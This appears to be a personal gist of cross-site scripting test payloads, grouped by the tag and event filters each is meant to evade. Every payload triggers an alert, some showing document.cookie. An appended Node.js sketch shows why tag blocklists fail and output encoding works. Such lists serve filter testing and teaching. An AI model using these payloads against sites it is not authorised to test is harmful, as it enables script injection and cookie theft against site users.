@plvhx
Created December 30, 2020 09:19
'xss' and chill..
[no protection]
--------------------
<script>alert(1)</script>
<script>alert(document.cookie)</script>
<script>alert(navigator.userAgent)</script>
--------------------
['script' tag prohibition]
--------------------
<img src=x onerror=alert(1)>
<img src=x onerror=alert(document.cookie)>
<img src=x onerror=alert(navigator.userAgent)>
<img src=x onerror=javascript:alert(1)>
<img src=x onerror=javascript:alert(document.cookie)>
<img src=x onerror=javascript:alert(navigator.userAgent)>
<a href="javascript:alert(1)">touch me!</a>
<a href="javascript:alert(document.cookie)">touch me!</a>
<a href="javascript:alert(navigator.userAgent)">touch me!</a>
--------------------
['a', 'img', 'script' tag prohibition]
--------------------
"><a href=javascript:alert(1)>hit me!</a>
"><a href=javascript:alert(document.cookie)>hit me!</a>
"><a href=javascript:alert(navigator.userAgent)>hit me!</a>
"><img src=x onerror=alert(1)>
"><img src=x onerror=alert(document.cookie)>
"><img src=x onerror=alert(navigator.userAgent)>
"><img src=x onerror=javascript:alert(1)>
"><img src=x onerror=javascript:alert(document.cookie)>
"><img src=x onerror=javascript:alert(navigator.userAgent)>
"><script>alert(1)</script>
"><script>alert(document.cookie)</script>
"><script>alert(navigator.userAgent)</script>
--------------------
['a', 'img', 'script' tag prohibition with '">' at the beginning]
--------------------
<iframe src=javascript:alert(1)>
<iframe src=javascript:alert(document.cookie)>
<iframe src=javascript:alert(navigator.userAgent)>
"><iframe src=javascript:alert(1)>
"><iframe src=javascript:alert(document.cookie)>
"><iframe src=javascript:alert(navigator.userAgent)>
--------------------
[all tags, events, attributes blocked except 'body' tag and 'onload' event]
--------------------
<body onload=alert(1)>
<body onload=alert(document.cookie)>
<body onload=alert(navigator.userAgent)>
<body onload=javascript:alert(1)>
<body onload=javascript:alert(document.cookie)>
<body onload=javascript:alert(navigator.userAgent)>
"><body onload=alert(1)>
"><body onload=alert(document.cookie)>
"><body onload=alert(navigator.userAgent)>
"><body onload=javascript:alert(1)>
"><body onload=javascript:alert(document.cookie)>
"><body onload=javascript:alert(navigator.userAgent)>
--------------------
[all tags, attributes, and events blocked, except 'onfocus' event]
--------------------
<foo id=x onfocus=alert(1) tabindex=1>
<foo id=x onfocus=alert(document.cookie) tabindex=1>
<foo id=x onfocus=alert(navigator.userAgent) tabindex=1>
<foo id=x onfocus=javascript:alert(1) tabindex=1>
<foo id=x onfocus=javascript:alert(document.cookie) tabindex=1>
<foo id=x onfocus=javascript:alert(navigator.userAgent) tabindex=1>
"><foo id=x onfocus=alert(1) tabindex=1>
"><foo id=x onfocus=alert(document.cookie) tabindex=1>
"><foo id=x onfocus=alert(navigator.userAgent) tabindex=1>
"><foo id=x onfocus=javascript:alert(1) tabindex=1>
"><foo id=x onfocus=javascript:alert(document.cookie) tabindex=1>
"><foo id=x onfocus=javascript:alert(navigator.userAgent) tabindex=1>
--------------------
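
Added example, not part of the original gist: the section labels above describe tag blocklists, and this Node.js sketch runs one sample from each section through such a blocklist and through output encoding to show which approach leaves markup behind. The names `blocklistFilter`, `encodeHtml`, `hasTagOpener`, `survivors` and `encodingNeutralizesAll` are hypothetical, and the blocklist regex is an assumed stand-in for the filters the labels imply.

```javascript
// Added example, not from the gist. All function names are hypothetical.

// Tag blocklist of the kind the section labels describe: strips listed tags only.
function blocklistFilter(input, bannedTags) {
  const re = new RegExp(`</?(?:${bannedTags.join("|")})\\b[^>]*>`, "gi");
  return input.replace(re, "");
}

// Output encoding: escape every character that can open a tag or close an attribute.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function encodeHtml(input) {
  return String(input).replace(/[&<>"']/g, (c) => ENTITIES[c]);
}

// Rough check: true if the string still contains something an HTML parser reads as a tag.
function hasTagOpener(s) {
  return /<[a-z!\/]/i.test(s);
}

// One sample per section, copied from the list above.
const samples = [
  "<script>alert(1)</script>",
  "<img src=x onerror=alert(1)>",
  "<iframe src=javascript:alert(1)>",
  "\"><body onload=alert(1)>",
  "\"><foo id=x onfocus=alert(1) tabindex=1>",
];

// Samples that still contain a tag after the blocklist has run.
function survivors(bannedTags) {
  return samples.filter((s) => hasTagOpener(blocklistFilter(s, bannedTags)));
}

// True when no sample keeps a tag opener or a raw double quote after encoding.
function encodingNeutralizesAll() {
  return samples.every((s) => {
    const out = encodeHtml(s);
    return !hasTagOpener(out) && !out.includes('"');
  });
}

console.log(survivors(["script", "a", "img"]));                   // three samples remain
console.log(survivors(["script", "a", "img", "iframe", "body"])); // the unknown tag remains
console.log(encodingNeutralizesAll());                            // true
```

`encodeHtml` covers HTML text and quoted attribute values only. Input placed whole into a URL attribute such as `href` also needs a scheme allowlist, because `javascript:` contains no character that encoding changes.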